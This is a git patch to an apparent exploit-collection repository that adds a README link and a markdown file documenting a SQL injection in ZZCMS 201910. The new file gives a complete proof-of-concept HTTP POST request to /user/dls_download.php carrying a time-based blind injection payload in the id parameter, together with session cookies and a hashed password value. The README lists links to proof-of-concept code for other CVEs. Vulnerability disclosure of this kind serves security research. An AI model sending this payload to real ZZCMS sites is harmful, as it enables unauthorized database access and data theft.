From 6a2c9c9e729e7430b315558221d752e76dfd3933 Mon Sep 17 00:00:00 2001
From: mr-xn <mrxn.net@gmail.com>
Date: Thu, 2 Jan 2020 19:33:38 +0800
Subject: [PATCH] =?UTF-8?q?add=20zzcms201910=20sql=E6=B3=A8=E5=85=A5?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 README.md                     |  2 +-
 ZZCMS201910 SQL Injections.md | 30 ++++++++++++++++++++++++++++++
 2 files changed, 31 insertions(+), 1 deletion(-)
 create mode 100644 ZZCMS201910 SQL Injections.md

diff --git a/README.md b/README.md
index 78fcfac..bf90164 100644
--- a/README.md
+++ b/README.md
@@ -98,7 +98,7 @@
 - [CVE-2019-2107-Android播放视频-RCE-POC(Android 7.0版本，7.1.1版本，7.1.2版本，8.0版本，8.1版本，9.0版本)](https://github.com/marcinguy/CVE-2019-2107)
 - [CVE-2019-19844-Django重置密码漏洞(受影响版本:Django master branch,Django 3.0,Django 2.2,Django 1.11)](https://github.com/ryu22e/django_cve_2019_19844_poc/)
 - [CVE-2019-17556-unsafe-deserialization-in-apache-olingo(Apache Olingo反序列化漏洞，影响: 4.0.0版本至4.6.0版本)](https://medium.com/bugbountywriteup/cve-2019-17556-unsafe-deserialization-in-apache-olingo-8ebb41b66817)
-- 
+- [ZZCMS201910 SQL Injections](./ZZCMS201910%20SQL%20Injections.md)
 
 ## 提权辅助相关
 
diff --git a/ZZCMS201910 SQL Injections.md b/ZZCMS201910 SQL Injections.md
new file mode 100644
index 0000000..df059f6
--- /dev/null
+++ b/ZZCMS201910 SQL Injections.md	
@@ -0,0 +1,30 @@
+## ZZCMS201910 SQL Injections SQL注入  
+
+> 前提是你有一个具有购买权限的VIP会员账户
+> 不然会提示：`"您所在的用户组没有下载此信息的权限！<br><input  type=button value=升级成VIP会员 onclick=\"location.href='/one/vipuser.php'\"/>"`  
+
+### 注入点 ` user/dls_download with parameter $id`
+
+### 利用POC如下  
+
+```raw
+POST /user/dls_download.php HTTP/1.1
+Host: test.com
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 45
+Origin: http://test.com
+Connection: close
+Referer: http://test.com/user/advzt_manage.php
+Cookie: Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1576564072; Hm_lvt_520556228c0113270c0c772027905838=1576734687,1577071433; app_href_source=myapp/free; PHPSESSID=f0fb73cc2f2d41d2a3b1edb7340841a3; arrlanguage=metinfo; Hm_lpvt_520556228c0113270c0c772027905838=1577672843; acc_auth=4b90lwFZZGUdz47dUybObYz1MoB612Tg7bCn10U0P4BKoY%2FR9nnvQapvPIBF%2BB4w11KPOWCNH%2FLvwx9rH7424ZH0; acc_key=eXM7G4F; __tins__713776=%7B%22sid%22%3A%201577775703119%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201577777503119%7D; __51cke__=; __51laig__=28; bdshare_firstime=1577771760963; UserName=test; PassWord=4297f44b13955235245b2497399d7a93
+Upgrade-Insecure-Requests: 1
+Pragma: no-cache
+Cache-Control: no-cache
+
+id[]=1&id[]=2)%0aor%0asleep(5)%23&FileExt=xxx
+```
+
+来源与：https://github.com/JcQSteven/blog/issues/15
\ No newline at end of file